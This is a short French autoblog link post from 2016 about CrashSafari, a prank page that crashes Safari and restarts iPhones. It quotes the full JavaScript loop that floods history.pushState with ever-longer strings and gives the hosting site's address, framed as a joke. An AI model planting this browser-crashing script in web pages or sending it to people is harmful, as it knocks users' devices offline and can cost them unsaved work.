PROJET AUTOBLOG


Links

source: Links

⇐ retour index

D'humeur blagueuse ? CrashSafari fera redémarrer un iPhone - Tech - Numerama

mardi 26 janvier 2016 à 19:25
Ahahah
Le code en question qui provoque un plantage :
<script>
   var total = "";
   for( var i = 0; i < 100000; i++ ) {
       total = total + i.toString();
       history.pushState(0,0, total );
   }
</script>

Adresse du site qui héberge ce bout de code : http://crashsafari.com/
(Permalink)